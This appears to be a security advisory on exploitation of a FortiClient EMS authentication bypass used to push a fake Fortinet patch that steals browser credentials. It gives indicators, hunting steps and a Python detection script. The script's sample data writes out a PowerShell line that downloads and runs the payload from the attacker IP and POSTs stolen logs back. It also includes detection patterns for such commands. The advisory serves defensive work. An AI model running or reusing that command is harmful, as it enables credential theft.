FortiClient EMS Flaw Exploited to Deploy Credential Stealer Across Managed Endpoints

CVE-2026-35616 · CVSS 9.1 · Authentication bypass in FortiClient EMS · Fixed in EMS 7.4.7 and later · Active exploitation observed May 2026

[Attack-chain diagram: attacker at 83.138.53[.]110 exploits the CVE-2026-35616 auth bypass on the FortiClient EMS; on each managed endpoint fortitray.exe launches cmd.exe, which runs Base64-encoded PowerShell that fetches FortiEndpoint_Patch.exe; the stealer collects browser credentials and cookies (session hijack / MFA bypass) into a log under ProgramData, which the PowerShell stage exfiltrates by HTTP POST to the C2 server at 83.138.53[.]110.]
TL;DR
  • What: Attackers exploit CVE-2026-35616 (CVSS 9.1, auth bypass) in FortiClient EMS to push a fake Fortinet update — FortiEndpoint_Patch.exe — to every managed endpoint via fortitray.exe and Base64-encoded PowerShell.
  • Impact: Fleet-wide credential theft (browser passwords, session cookies, autofill data) enabling MFA bypass and SSO session hijacking; stolen data exfiltrated to 83.138.53[.]110.
  • Fix / mitigation: Upgrade FortiClient EMS to v7.4.7 or later immediately; hunt for unauthorized Remote Access Profile changes, Base64 PowerShell from fortitray.exe, and connections to 83.138.53[.]110; force password resets and invalidate session tokens.
  • Who's at risk: Any organization running FortiClient EMS below v7.4.7 — a single unpatched EMS server exposes the entire managed endpoint fleet without requiring per-device intrusion.

Threat actors are actively exploiting a critical authentication bypass vulnerability in FortiClient Endpoint Management Server (EMS) to distribute credential-stealing malware across entire managed endpoint fleets. The attack, observed by Arctic Wolf in May 2026, weaponizes trusted endpoint management infrastructure to deliver malicious payloads disguised as legitimate Fortinet updates—turning enterprise security tools into attack vectors.

The exploited flaw, CVE-2026-35616, is a pre-authentication API access bypass rated CVSS 9.1: an unauthenticated attacker who can reach the EMS API gains privileged access to the server, so the bypass is also a privilege escalation. Fortinet fixed it in FortiClient EMS 7.4.7 and later; organizations running earlier versions face immediate risk of fleet-wide compromise through a single point of failure.

Attack Chain: From Authentication Bypass to Fleet-Wide Compromise

The attack begins with exploitation of the API authentication bypass, allowing threat actors to gain privileged access to the FortiClient EMS without credentials. Once inside, attackers modify system configurations to defer firmware upgrade reminders—buying time to operate undetected. They then alter Remote Access Profile configurations and endpoint policies to inject malicious scripts that execute across all managed devices.

Supply Chain Impact

Once the EMS is compromised, every managed endpoint becomes a potential execution target without a separate intrusion path to each device. This is the supply chain pattern: trusted management infrastructure becomes the distribution mechanism for malware.

The execution method is particularly insidious. Attackers leverage fortitray.exe, a legitimate signed FortiClient executable, to launch a .cmd script through cmd.exe. Because the parent process is a trusted, signed binary, the activity blends in with normal management operations and slips past controls that allow-list legitimate processes or judge a child process by the reputation of its parent.

Technical Execution: PowerShell and Base64 Obfuscation

The .cmd script invokes a Base64-encoded PowerShell command that downloads and executes a malicious payload masquerading as 'FortiEndpoint_Patch.exe.' The PowerShell script handles three critical functions: downloading the payload, executing it on the endpoint, and exfiltrating stolen data to attacker infrastructure at 83.138.53[.]110 via HTTP POST requests.

According to Arctic Wolf, the execution pattern suggests threat actors used FortiClient's own management pathways to push malicious PowerShell commands in a manner that closely resembled legitimate management operations. This technique exploits the inherent trust organizations place in their endpoint management systems, making detection significantly more challenging.

Credential Stealer Capabilities and Data Targets

The payload, FortiEndpoint_Patch.exe, is a previously unreported Windows information stealer with comprehensive data harvesting capabilities. The malware targets both Chromium-based browsers (Chrome, Edge, Brave) and Gecko-based browsers (Firefox), extracting saved passwords, session cookies, and autofill data.

The stealer writes captured data to log files stored in the ProgramData directory. Notably, the malware itself lacks built-in network exfiltration capabilities—instead relying on the PowerShell script component to transmit stolen data to attacker-controlled infrastructure. This modular approach may be designed to evade endpoint detection and response (EDR) solutions that monitor for network activity from suspicious executables.

Post-Compromise Risk: Session Hijacking and MFA Bypass

Critical Secondary Risk

Session cookies and saved browser credentials give threat actors follow-on access to cloud services, internal applications, and other authenticated resources. Where a service accepts a replayed session token without binding it to the original device or network, the attacker presents the stolen cookie and is never shown an MFA prompt, gaining persistent access to critical systems.

The theft of session cookies presents a particularly severe risk for organizations relying on multi-factor authentication for security. Valid session tokens allow attackers to impersonate legitimate users without triggering authentication challenges, effectively bypassing MFA protections. This grants access to SaaS applications, cloud infrastructure, and internal systems that store sensitive data or control critical operations.

The scope of potential compromise extends beyond individual credentials. With access to corporate authentication sessions, threat actors can pivot to cloud services, internal applications, and privileged resources. Organizations using single sign-on (SSO) face amplified risk, as compromised SSO sessions may provide access to multiple integrated applications from a single stolen token.

Immediate Actions and Mitigation Measures

Organizations running FortiClient EMS must immediately verify they are operating version 7.4.7 or later. Any organization on earlier versions should treat this as a critical priority upgrade. During the patching window, security teams should implement compensating controls including network segmentation to limit EMS access and enhanced monitoring of PowerShell execution on endpoints.

Hunt for indicators of compromise by examining FortiClient EMS configuration changes, particularly modifications to Remote Access Profiles and endpoint policies that no administrator can account for, and any change that defers firmware upgrade reminders. On endpoints, review process-creation telemetry (Sysmon event 1, or Security event 4688 with command-line auditing enabled) for cmd.exe launched by fortitray.exe and for powershell.exe carrying an -EncodedCommand argument beneath that chain; PowerShell script block logging (event 4104) records the decoded script. Monitor for network connections to 83.138.53[.]110 and inspect the ProgramData directory for recently written log files that do not belong to an installed product.
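The process chain described under "Supply Chain Impact" and "Technical Execution" and the hunt steps above can be turned into a concrete check. The Python below is an added example, not code from Arctic Wolf, Fortinet, or RedEye Security. It runs over constructed Sysmon-style process-creation (event 1) and network-connection (event 3) records: the host names, process GUIDs, the update.cmd file name, the FortiTray.exe install path, and the decoded script body are assumptions made for the sample, while the fortitray.exe -> cmd.exe -> encoded PowerShell chain, the FortiEndpoint_Patch.exe name, and 83.138.53[.]110 come from this post.

```python
import base64
import re

# Indicators taken from this post. The IP appears defanged there as 83.138.53[.]110.
C2_IP = "83.138.53.110"
PAYLOAD_NAME = "fortiendpoint_patch.exe"

# powershell.exe accepts -e, -ec, -enc, -encoded and -encodedcommand; requiring
# whitespace right after the switch keeps -ExecutionPolicy from matching.
ENCODED_ARG = re.compile(
    r"-e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Content of a decoded script matching the behaviour described above:
# download-and-run, HTTP POST exfiltration, the C2 address, the fake patch name.
SCRIPT_INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "http_post": re.compile(
        r"Invoke-RestMethod.*-Method\s+Post|Upload(?:File|Data|String)", re.I),
    "c2_ip": re.compile(re.escape(C2_IP)),
    "fake_patch_name": re.compile(re.escape(PAYLOAD_NAME), re.I),
}


def encode_powershell(script: str) -> str:
    """-EncodedCommand expects Base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries -EncodedCommand, else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not Base64, or not UTF-16LE text
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage(event: dict, by_guid: dict, max_depth: int = 5) -> list:
    """Parent, grandparent, ... via ParentProcessGuid links (Sysmon event 1).
    The immediate parent comes from the event itself, so the chain is still
    usable when the ancestor's own creation event was never logged."""
    chain = [_basename(event.get("ParentImage", ""))]
    guid = event.get("ParentProcessGuid")
    for _ in range(max_depth):
        parent = by_guid.get(guid)
        if parent is None:
            break
        chain.append(_basename(parent.get("ParentImage", "")))
        guid = parent.get("ParentProcessGuid")
    return [name for name in chain if name]


def hunt(events: list) -> list:
    """Apply the three checks from the post to Sysmon-style records."""
    by_guid = {e["ProcessGuid"]: e for e in events if e.get("EventID") == 1}
    findings = []
    for e in events:
        if e.get("EventID") == 1:
            image = _basename(e["Image"])
            chain = lineage(e, by_guid)
            # 1. FortiClient's tray process launching a command shell.
            if image == "cmd.exe" and "fortitray.exe" in chain:
                findings.append({"rule": "fortitray_spawns_cmd", "host": e["Computer"],
                                 "cmdline": e["CommandLine"]})
            # 2. Encoded PowerShell under fortitray.exe, or whose decoded body
            #    carries an indicator; ordinary admin use of -enc is left alone.
            if image in ("powershell.exe", "pwsh.exe"):
                script = decode_encoded_command(e["CommandLine"])
                if script is not None:
                    hits = sorted(n for n, rx in SCRIPT_INDICATORS.items() if rx.search(script))
                    if hits or "fortitray.exe" in chain:
                        findings.append({"rule": "encoded_powershell", "host": e["Computer"],
                                         "lineage": chain, "indicators": hits, "script": script})
        # 3. Any process talking to the exfiltration address.
        elif e.get("EventID") == 3 and e.get("DestinationIp") == C2_IP:
            findings.append({"rule": "c2_connection", "host": e["Computer"],
                             "image": _basename(e["Image"]),
                             "dst": f"{C2_IP}:{e.get('DestinationPort')}"})
    return findings


# Constructed sample, not captured telemetry. Host names, GUIDs, the update.cmd
# name, the FortiTray.exe path and the script body are placeholders.
SAMPLE_SCRIPT = (
    "$u='http://83.138.53.110/FortiEndpoint_Patch.exe';"
    "$p=\"$env:ProgramData\\FortiEndpoint_Patch.exe\";"
    "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p -Wait;"
    "Invoke-RestMethod -Uri 'http://83.138.53.110/upload' -Method Post "
    "-InFile \"$env:ProgramData\\ftc.log\""
)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-0421", "ProcessGuid": "{cmd-1}", "ParentProcessGuid": "{tray-1}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "CommandLine": r'cmd.exe /c "C:\ProgramData\update.cmd"'},
    {"EventID": 1, "Computer": "WS-0421", "ProcessGuid": "{ps-1}", "ParentProcessGuid": "{cmd-1}",
     "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_powershell(SAMPLE_SCRIPT)},
    {"EventID": 1, "Computer": "WS-0422", "ProcessGuid": "{ps-2}", "ParentProcessGuid": "{explorer-1}",
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + encode_powershell("Get-Service FortiClient")},
    {"EventID": 3, "Computer": "WS-0421", "Image": PS, "DestinationIp": C2_IP, "DestinationPort": 80},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["rule"], f["host"], f.get("indicators", f.get("dst", f.get("cmdline"))))
```

Decoding matters because -EncodedCommand carries UTF-16LE text, so a plain Base64-to-ASCII decode yields interleaved NUL bytes and string matches fail; lineage is rebuilt from ParentProcessGuid so the check still fires when fortitray.exe is two hops up rather than the direct parent. Against real telemetry, replace SAMPLE_EVENTS with records exported from Sysmon or an EDR; PowerShell script block logs (event 4104) give the same decoded content without depending on the command line being captured.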

Force password resets for all users and invalidate existing session tokens, particularly for cloud services and applications accessible via SSO. Implement conditional access policies that require fresh authentication for sensitive operations, even when valid session cookies exist. Review and harden endpoint policies to restrict PowerShell execution where not operationally required, and enable PowerShell logging with script block logging to capture detailed execution data.

Strategic Implications for Endpoint Management Security

This attack demonstrates a fundamental risk in centralized endpoint management architectures: a single vulnerability in management infrastructure creates a force multiplier for attackers. Organizations must treat endpoint management systems as tier-zero assets requiring the same security rigor applied to domain controllers and identity providers.

The use of legitimate executables and management pathways to deliver malware highlights the limitations of traditional security approaches that rely on file reputation and process whitelisting. Security teams need behavioral analytics capable of detecting anomalous management operations, even when executed through trusted tools. The ability of attackers to disguise malicious activity as legitimate updates underscores the need for verification mechanisms that confirm the authenticity of management commands before execution.

As endpoint management systems become increasingly critical to security operations—used for patch deployment, configuration management, and security tool orchestration—they simultaneously become high-value targets. Organizations should implement defense-in-depth strategies that assume compromise of management infrastructure, including network segmentation, privileged access management for administrative functions, and independent monitoring systems that can detect malicious activity even when management tools are weaponized against the organization.
